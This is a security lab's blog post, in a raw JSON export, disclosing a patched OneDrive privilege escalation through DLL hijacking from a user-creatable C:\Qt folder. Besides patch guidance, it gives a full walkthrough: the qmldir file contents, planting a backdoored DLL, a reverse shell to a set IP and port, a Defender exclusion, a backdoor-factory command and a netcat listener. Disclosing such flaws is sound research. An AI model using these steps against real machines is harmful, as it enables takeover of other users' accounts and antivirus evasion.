{"id":97,"date":"2020-04-27T07:30:02","date_gmt":"2020-04-27T07:30:02","guid":{"rendered":"http:\/\/labs.redyops.com\/?p=97"},"modified":"2021-10-06T06:40:52","modified_gmt":"2021-10-06T06:40:52","slug":"onedrive-privilege-of-escalation","status":"publish","type":"post","link":"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/","title":{"rendered":"OneDrive < 20.073 Escalation of Privilege"},"content":{"rendered":"
<\/a><\/a><\/a><\/a><\/a><\/a><\/a><\/a><\/a><\/a><\/a><\/div><\/div>\n\n\n\n

Summary<\/strong><\/h1>\n\n\n\n

Assigned CVE<\/strong>: Microsoft has publicly acknowledged and patched the issue. However, when we asked for the CVE number, Microsoft replied to us that the purpose of a CVE is to advise customers on the security risk and how to take action to protect themselves. Microsoft issues CVEs for MS products that require users to take action to update their environments . Although we have seen CVEs for OneDrive in the past, we respect their decision not to issue a CVE number. <\/p>\n\n\n\n

Known to Neurosoft\u2019s RedyOps Labs since<\/strong>: 31\/03\/2020<\/p>\n\n\n\n

Exploit<\/strong> Code<\/strong>: https:\/\/github.com\/RedyOpsResearchLabs\/OneDrive-PrivEsc <\/a><\/p>\n\n\n

Vendor\u2019s Acknowledgement<\/strong> : https:\/\/portal.msrc.microsoft.com\/en-us\/security-guidance\/researcher-acknowledgments-online-services<\/a> (March 2020)<\/p>\n

Important note regarding the patch<\/strong>:  Ensure that you have OneDrive >= 20.073. If you don’t, you can download the Rolling out version of the Production Ring (20.084.0426.0007<\/a>), from this link  https:\/\/go.microsoft.com\/fwlink\/?linkid=860984 <\/a><\/p>\n\n\n

An Escalation of Privileges (EoP) exists in OneDrive < 20.073. The latest version we tested is OneDrive 19.232.1124.0012 and Insider Preview version 20.052.0311.0010 . The exploitation of this EoP , gives the ability to a user with low privileges to gain access as any other user. In order for the exploitation to be successful, the targeted user must interact with the OneDrive (e.g right click on the tray icon) in order for the attacker to gain access .<\/p>\n\n\n\n

Description<\/strong><\/h1>\n\n\n\n

The vulnerability arises because the OneDrive is missing some QT folders and tries to locate them from C:\\QT. The C:\\QT folder does not exist by default and any user with low privileges can create it. If an attacker creates the file C:\\Qt\\Qt-5.11.1\\qml\\QtQuick.2.7\\qmldir with the following contents:<\/p>\n\n\n\n

module QtQuick \nplugin qtquick2plugin \nclassname QtQuick2Plugin \ntypeinfo plugins.qmltypes \ndesignersupported<\/code><\/pre>\n\n\n\n
The OneDrive will try to load the C:\\Qt\\Qt-5.11.1\\qml\\QtQuick.2.7\\qtquick2plugin.dll<\/strong> . As far as the attacker can place a backdoor in the qtquick2plugin.dll , the OneDrive will load the backdoor.<\/p>\n\n\n\n
Exploitation<\/strong><\/h1>\n\n\n\n
The exploit can be found in our GitHub.<\/p>\n\n\n\n
Today, the provided backdoor is being detected by Defender. Bypassing Defender is not the scope of this blog-post. Our purpose is not to bypass the defender AV but to provide a Proof of Concept (PoC) of the EoP. Thus first add an exception to the Defender for the folder C:\\QT (or for the provided backdoor file qtquick2plugin.dll )<\/p>\n\n\n\n
  1. Login as a low privileged user<\/li>
  2. Close your OneDrive<\/li>
  3. Copy paste the provided QT folder under the C: drive. After the copy paste, you should have the following files in your system:<\/li><\/ol>\n\n\n\n
    • C:\\Qt\\Qt-5.11.1\\qml\\QtQuick.2.7\\qtquick2plugin.dll (This the qtquick2plugin.dll in which we have added a backdoor for reverse shell) <\/li>
    • C:\\Qt\\Qt-5.11.1\\qml\\QtQuick.2.7\\qmldir <\/li>
    • C:\\Qt\\Qt-5.11.1\\qml\\QtQuick.2.7\\qtquick2plugin.dll.org (this file is not needed. It’s the original qtquick2plugin.dll file.<\/li><\/ul>\n\n\n\n
      In order for the exploitation to take place, the victim must login into the system and interact with the OneDrive. If you want to verify the exploitation perform the following:<\/p>\n\n\n\n
      1. Logout<\/li>
      2. Login as another user. For example perform a login as an Administrator.<\/li>
      3. Right click on the tray icon of the OneDrive<\/li>
      4. You should receive a reverse shell from the Administrator to your C2C.<\/li><\/ol>\n\n\n\n
        The provided qtquick2plugin.dll contains a reverse shell which has been configured to return to the ip address 192.168.2.3 and port 8080 .<\/p>\n\n\n\n
        Supporting materials<\/strong><\/h1>\n\n\n\n
        In order to backdoor the qtquick2plugin.dll , we used the following:<\/p>\n\n\n\n
        1. The original file qtquick2plugin.dll (you can find one under the folder “C:\\Users\\youruser\\AppData\\Local\\Microsoft\\OneDrive\\19.232.1124.****\\qml\\QtQuick.2\\” )<\/li>
        2. the the-backdoor-factory from https:\/\/github.com\/secretsquirrel\/the-backdoor-factory<\/li>
        3. Create the backdoor with the following command line: <\/li><\/ol>\n\n\n\n
          \n.\/backdoor.py -f qtquick2plugin.dll -H ip -P port -s reverse_shell_tcp_inline -a<\/code><\/pre>\n\n\n\n
          Wait for the reverse shell with a netcat “nc -nlvp port”<\/p>\n\n\n\n
          Video PoC<\/strong><\/h1>\n\n\n\n
          \n